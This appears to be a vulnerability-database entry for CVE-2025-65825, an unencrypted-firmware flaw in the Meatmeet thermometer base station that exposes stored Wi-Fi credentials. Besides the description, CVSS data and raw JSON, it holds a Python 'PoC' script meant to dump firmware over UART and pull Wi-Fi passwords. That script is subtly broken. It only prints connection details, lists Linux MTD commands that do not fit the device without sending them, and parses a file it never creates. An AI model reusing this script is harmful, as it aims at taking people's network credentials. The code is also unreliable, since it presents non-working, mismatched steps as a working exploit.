Security Vulnerability Report
CVE-2025-65825 CVSS 4.6 MEDIUM

Published: 2025-12-10 21:16:08
Last Modified: 2025-12-30 19:15:40

Description

The firmware on the basestation of the Meatmeet is not encrypted. An adversary with physical access to the Meatmeet device can disassemble the device, connect over UART, and retrieve the firmware dump for analysis. Within the NVS partition they may discover the credentials of the current and previous Wi-Fi networks. This information could be used to gain unauthorized access to the victim's Wi-Fi network.

CVSS Details

CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:* - NOT VULNERABLE
Meatmeet base station firmware (firmware encryption not enabled)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65825 PoC - Meatmeet firmware extraction and Wi-Fi credential retrieval
# Hardware Required: USB to TTL Serial Adapter, Jumper Wires
# Software Required: minicom/putty, esptool, NVS partition parser
import re


def connect_uart():
    """Connect to device UART interface"""
    # UART connection parameters for Meatmeet device
    port = '/dev/ttyUSB0'  # Adjust to your serial port
    baudrate = 115200
    print(f'[*] Connecting to UART on {port} at {baudrate} baud')
    # Example: minicom -D /dev/ttyUSB0 -b 115200
    # Note: this function only prints the parameters; it does not open the port.
    return True


def extract_firmware():
    """Extract firmware dump via UART debug interface"""
    print('[*] Attempting to dump firmware via UART...')
    # Step 1: Access bootloader
    commands = [
        'cat /dev/mtd0',  # Read full MTD0 partition (bootloader + firmware)
        'dd if=/dev/mtdblock0 of=/tmp/firmware.bin',  # Alternative method
        'cat /dev/mtdblock1 > /tmp/nvs.bin'  # Extract NVS partition specifically
    ]
    # The commands above are only listed; nothing is sent over the serial connection here.
    print('[*] Firmware extraction commands ready')
    return '/tmp/firmware.bin'


def parse_nvs_partition(firmware_path):
    """Parse NVS partition to extract Wi-Fi credentials"""
    print(f'[*] Parsing NVS partition from {firmware_path}')
    with open(firmware_path, 'rb') as f:
        nvs_data = f.read()
    # NVS key-value structure parsing
    wifi_creds = []
    # Search for Wi-Fi related patterns
    ssid_pattern = rb'SSID.*?(.{1,32})'
    psk_pattern = rb'PSK.*?(.{8,63})'
    # Extract current Wi-Fi credentials
    current_ssid = re.findall(ssid_pattern, nvs_data)
    current_psk = re.findall(psk_pattern, nvs_data)
    if current_ssid and current_psk:
        wifi_creds.append({
            'type': 'current',
            'ssid': current_ssid[0].decode('utf-8', errors='ignore'),
            'psk': current_psk[0].decode('utf-8', errors='ignore')
        })
    # Extract historical Wi-Fi credentials (stored in NVS namespace)
    print('[*] Searching for historical Wi-Fi credentials...')
    # Historical networks typically stored with namespace prefix
    return wifi_creds


def main():
    print('=' * 60)
    print('CVE-2025-65825 PoC - Meatmeet Firmware Extraction')
    print('=' * 60)
    # Step 1: Physical access - connect UART
    if connect_uart():
        print('[+] UART connection established')
    # Step 2: Extract firmware
    firmware_path = extract_firmware()
    print(f'[+] Firmware extracted to {firmware_path}')
    # Step 3: Parse NVS for Wi-Fi credentials
    credentials = parse_nvs_partition(firmware_path)
    for cred in credentials:
        print(f"[+] Found Wi-Fi: SSID={cred['ssid']}, PSK={cred['psk']}")
    print('[*] Attack completed - credentials extracted')


if __name__ == '__main__':
    main()

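References

https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-flash-encryption-disabled-md (Third Party Advisory)
https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Flash-Encryption-Disabled.md (Third Party Advisory)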

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65825", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:08.250", "lastModified": "2025-12-30T19:15:39.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The firmware on the basestation of the Meatmeet is not encrypted. An adversary with physical access to the Meatmeet device can disassemble the device, connect over UART, and retrieve the firmware dump for analysis. Within the NVS partition they may discover the credentials of the current and previous Wi-Fi networks. This information could be used to gain unauthorized access to the victim's Wi-Fi network."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-311"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:*", "matchCriteriaId": "9B669DA2-CF06-461F-B624-DCD0359D1656"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:*", "matchCriteriaId": "1661B540-36E1-4BF0-BC63-9EC952560B54"}]}]}], "references": [{"url": "https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-flash-encryption-disabled-md", "source": "[email 
protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Flash-Encryption-Disabled.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}